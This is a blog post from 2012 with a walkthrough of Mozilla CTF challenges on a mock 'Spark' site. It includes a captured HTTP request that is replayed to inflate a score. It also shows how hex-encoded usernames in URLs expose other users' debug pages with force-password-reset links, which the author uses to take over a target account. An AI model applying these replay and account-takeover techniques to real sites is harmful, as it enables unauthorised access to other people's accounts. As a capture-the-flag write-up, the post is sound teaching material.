Thursday, January 26, 2012

Mozilla CTF 2012 - 3 - Spark - Things long forgotten / 4 - Spark - Interesting Lineage / Kraken

This challenge was the first of 9 challenges based off the Spark site that Mozilla had up for awhile. I figured that I would role these two into one just to keep it simple since these ones were pretty strait forward.


For the first one you needed to create an account with the spark site. Once you did this all that you needed to do was "boost your spark" by following the instructions that went from your location to boost and directed you to the flag page.


Once you added this minus the quotes you snag some more points.

You can also from another registered account boost your account and snag you request and keep resubmitting to get you name on the board.

OST /en-US/m/boost2_confirm HTTP/1.1
Host: ocean.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ocean.mozillactf.org/en-US/home
Content-Length: 77
Cookie: csrftoken=d0d01d47dc3e20835703eaf0c82d0a16; sessionid=a78c616fcd3d2889899098731f20ab9e; parent=qqcrew
DNT: 1
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=d0d01d47dc3e20835703eaf0c82d0a16&no_parent=&parent=qqcrew






Next....

The next piece ties into "bringing down the Kraken" but I digress. If you continue to browse the spark site you will eventually notice that you have a username listed in the urls as:

/en-US/users/717163726577
 So what is the "717163726577" portion that you ask, well simple it just your html encoded team name.

qqcrew = qqcrew = 717163726577

Ok? so what?  Well if you happen to have browsed to the site listed above you would have gotten a page that you can reset your password that contained the flag.

<div class="section">
 <div>DEBUG USER</div>
 <div>Name: <span>qqcrew</div>
 <div>Email: <span>qq@crew.com</div>
 <div>First Name :<span></div>
 <div>Last Name :<span></div>
 <div>City Name :<span>Cape Town</div>
 <div>Reset Email Password [Disabled]</div>
 <div>Force Password Reset <a href="https://ocean.mozillactf.org/pwreset/Nx0hBEhFUGMCARRcAhQhQxEXEk8XGh8ZAlEoChYAV0cNTx0QEBguQwEMEEYXTko=">[Enabled]</a></div>
</div>
<!-- Flag ='There are so many buried treasures in the sea!' -->

Bingo ! Another flag. 

So what else is there? Well now you can mess with anyone that you want which leads to bringing down the Kraken. So taking what we know we browse to:

/en-US/users/4B72616B656E

Then we do a force reset and Bingo another one drops!


By -
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Installing Older Versions of VeraCrypt on Linux: A Step-by-Step Guide

Introduction: During some house cleaning I had an old external drive that was encrypted with an old version of truecrypt. I wanted to mount...